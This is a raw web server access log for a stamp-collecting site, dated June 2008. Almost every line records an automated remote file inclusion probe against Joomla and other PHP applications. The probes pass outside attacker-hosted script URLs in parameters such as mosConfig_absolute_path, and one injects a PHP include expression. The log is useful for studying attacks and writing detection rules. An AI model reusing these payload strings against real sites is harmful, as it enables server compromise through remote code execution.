67.19.160.58 - - [01/Jun/2008:20:10:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.mathstamps.com"
64.185.237.149 - - [01/Jun/2008:20:11:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.185.237.149 - - [01/Jun/2008:20:11:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.61.37.87 - - [01/Jun/2008:20:11:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.61.37.87 - - [01/Jun/2008:20:11:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
203.237.236.11 - - [01/Jun/2008:20:11:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
203.237.236.11 - - [01/Jun/2008:20:11:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
69.61.37.87 - - [01/Jun/2008:20:11:54 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.185.237.149 - - [01/Jun/2008:20:11:55 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.205.74.80 - - [01/Jun/2008:20:11:58 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
211.220.193.170 - - [01/Jun/2008:20:12:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.19.160.58 - - [01/Jun/2008:20:12:17 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.mathstamps.com"
211.220.193.170 - - [01/Jun/2008:20:12:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:13:23 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:13:23 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:13:24 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
164.124.107.55 - - [01/Jun/2008:20:13:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
164.124.107.55 - - [01/Jun/2008:20:13:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.237.236.11 - - [01/Jun/2008:20:14:04 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
211.220.193.170 - - [01/Jun/2008:20:15:02 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:15:14 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:15:14 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:15:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
164.124.107.55 - - [01/Jun/2008:20:15:30 -0700] "GET //skin/zero_vote/error.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:20:15:51 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:20:15:51 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:16:28 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:16:29 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:16:29 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:16:39 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:16:51 -0700] "GET /logs/access_080428.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:20:17:42 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
203.98.181.34 - - [01/Jun/2008:20:19:48 -0700] "GET /logs/access_080512.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.98.181.34 - - [01/Jun/2008:20:19:49 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.98.181.34 - - [01/Jun/2008:20:19:49 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:19:51 -0700] "GET /logs/access_080428.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:21:57 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:00 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:02 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:16 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:18 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:20 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:33 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:39 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:22:41 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:20:23:42 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:20:23:43 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:25:16 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:25:16 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:20:25:49 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:26:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:26:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:20:31:19 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.193.211.155 - - [01/Jun/2008:20:31:19 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://singspiration.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:20:31:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:20:31:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:20:34:04 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:20:36:09 -0700] "GET /logs/access_080512.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:37:33 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:37:33 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.230.196.115 - - [01/Jun/2008:20:38:03 -0700] "GET /logs/content.php?page=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.230.196.115 - - [01/Jun/2008:20:38:03 -0700] "GET /content.php?page=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:20:38:54 -0700] "GET /logs/access_080512.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:20:38:54 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:20:38:55 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.46.111.12 - - [01/Jun/2008:20:39:26 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.46.111.12 - - [01/Jun/2008:20:39:26 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:20:39:34 -0700] "GET /logs/access_080414.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.7.207.104 - - [01/Jun/2008:20:39:43 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.7.207.104 - - [01/Jun/2008:20:39:43 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:40:52 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:40:52 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.131.142.223 - - [01/Jun/2008:20:41:41 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.131.142.223 - - [01/Jun/2008:20:41:41 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [01/Jun/2008:20:42:56 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [01/Jun/2008:20:42:56 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.200.229.186 - - [01/Jun/2008:20:43:11 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ptilien.net/urlinn_includes/smarty/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.200.229.186 - - [01/Jun/2008:20:43:11 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ptilien.net/urlinn_includes/smarty/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.91.240.117 - - [01/Jun/2008:20:43:44 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.91.240.117 - - [01/Jun/2008:20:43:44 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:43:47 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:43:47 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
72.52.136.89 - - [01/Jun/2008:20:43:51 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.136.89 - - [01/Jun/2008:20:43:51 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.214.48.26 - - [01/Jun/2008:20:44:22 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.48.26 - - [01/Jun/2008:20:44:23 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:20:44:46 -0700] "GET /?D=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:45:05 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:45:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:45:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:45:47 -0700] "GET /logs/access_080505.log/joomla/index.php?option=com_restaurante&task=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:48:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.29.75.39 - - [01/Jun/2008:20:48:44 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [01/Jun/2008:20:48:44 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [01/Jun/2008:20:48:45 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [01/Jun/2008:20:48:45 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.230.196.115 - - [01/Jun/2008:20:50:32 -0700] "GET /logs/content.php?page=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.230.196.115 - - [01/Jun/2008:20:50:33 -0700] "GET /content.php?page=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:20:53:08 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:20:53:08 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:20:53:09 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:55:31 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:55:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:55:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:20:55:54 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:20:55:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:20:55:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:20:55:58 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:20:57:40 -0700] "GET /logs/access_080512.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dewa.6te.net/kampang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
208.46.111.12 - - [01/Jun/2008:20:59:33 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.46.111.12 - - [01/Jun/2008:20:59:33 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.7.207.104 - - [01/Jun/2008:21:00:15 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
